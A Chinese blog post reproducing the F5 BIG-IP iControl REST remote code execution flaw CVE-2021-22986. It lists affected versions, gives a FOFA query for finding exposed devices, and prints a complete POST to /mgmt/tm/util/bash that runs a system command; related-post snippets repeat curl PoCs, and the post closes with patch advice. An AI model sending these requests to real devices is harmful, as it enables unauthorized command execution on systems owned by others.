CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现

最新推荐文章于 2022-09-02 18:42:34 发布
最新推荐文章于 2022-09-02 18:42:34 发布
阅读量4.1k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞 cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32660043/article/details/115068467
版权

F5 BIG-IP

F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。

漏洞简介

F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。

影响版本

F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0

漏洞复现

fofa搜索关键词:

body="F5 Networks, Inc"

打开首页如下:

构造请求数据包,执行任意命令:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.1.123:8443
Connection: close
Content-Length: 39
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

POC

已有多位师傅放出了POC:

PeiQi:
https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ

S1xHcL:
https://github.com/S1xHcL/f5_rce_poc

修复建议

F5官方已发布相关安全更新,广大用户需及时更新到最新版本。
下载链接:
https://support.f5.com/csp/article/K02566623

cHr1s_h
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞
weixin_51387754的博客
11-03 407
漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行代码执行的风险声明,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。 影响版本: F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1
F5 BIG-IP代码执行漏洞CVE-2021-22986
m0_48520508的博客
04-01 2089
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 0x01漏洞概述 F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 0x02影响版本 F5 BIG-IP 16.0.0-16.0.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 14.1.0-14.1.3
F5 BIG-IP iControl RCE (CVE-2021-22986)
MD@@nr丫卡uer
03-19 2496
漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。 3、CVE-2021-22988 BIG
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
使用 python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问题 该POC目前只能支持部分命令,执行history , ls等失败,原因未知 后续 更新:修改部分命令执行异常情况 正则匹配,美化输出 更新其他POC利用方式 引用
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
include_voidmain的博客
06-15 2238
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)
thelostworld
03-20 3596
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986) 一、简介 该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 ​ 二、影响版本 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x:..
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现
qq_37200100的博客
06-16 1945
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现 一、在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择15.1.0长期维护版本 在这里,我们选择虚拟化版本 点击我接受按钮 选择第一个下载 下载完成之后,我们将下载下来的ova文件拖动到虚拟机当中,即可完成虚拟机的安装 二、BIGIP虚拟机的初始使用 虚拟机登陆 虚拟机
CVE-2021-22986-Poc:这是BIGIP iControl取消身份验证RCE的Poc
03-25
CVE-2021-22986-Poc 这是BIGIP iControl取消身份验证RCE的Poc POC:〜 curl -ksu管理员:[已删除] -d'{“ filePath”:“ id ”}'| jq。 curl -ksu: ://192.168.123.134/mgmt/shared/authn/login -d'{“ bigipAuthCookie”:“”,“ loginReference”:{“ link”:“ '| jq。 curl -su管理员:-H“内容类型:application / json” -d'{“ command”:“ run”,“ utilCmdArgs”:“-c id“}'| jq。 参考: :
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-22986:CVE-2021-22986F5 BIG-IP RCE
03-25
漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
sun_k的博客
03-25 858
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 一:漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台,,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。 二: 漏洞影响 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x:
F5漏洞复现[CVE-2020-5902]与[CVE_2021_22986]
一个程序员
11-20 2322
引言   F5 BIG-IP 广泛应用于大型企业,数据中心、云计算平台中,可以实现应用加速、负载均衡、SLL过载、web应用防火墙等功能。这篇文章主要是复现F5漏洞,包括其被远程代码执行的过程, 以及探究以下我们可以在F5远程执行代码之后可以做哪些事情。 环境搭建   F5的环境搭建教程在网上可以查到很多,这里大概介绍以下流程与心得。 首先搭建环境需要使用vmware软件运行F5的镜像来实现,需要下载并安装相关文件,这里使用的是家用个人电脑。 亲测过在F5网站上注册好后,下载含有漏洞F5镜像失败的,
CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现
最新发布
热爱学习,喜欢折腾!
09-02 2103
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞CVE-2022-1388)。
F5 多个严重漏洞通告
爱国小白帽
03-12 730
报告编号:B6-2021-031101 报告来源:360CERT 报告作者:360CERT 更新日期:2021-03-11 0x01漏洞简述 2021年03月11日,360CERT监测发现F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险通告,该漏洞编号为CVE-2021-22986,CVE-2021-22987,CVE-2021-22992.CVE-2021-22991,漏洞等级:严重,漏洞评分:9.8。 F5 安全通告更新了 BIG-IPBIG-IQ 中的多个严重漏洞。 对此.
F5紧急修复严重的 BIG-IP 预认证 RCE 漏洞
smellycat000的专栏
03-11 795
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队全球顶级企业网络设备巨头 F5 Networks 发现影响多数 BIG-IPBIG-IP软件版本的四个严重的远程代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值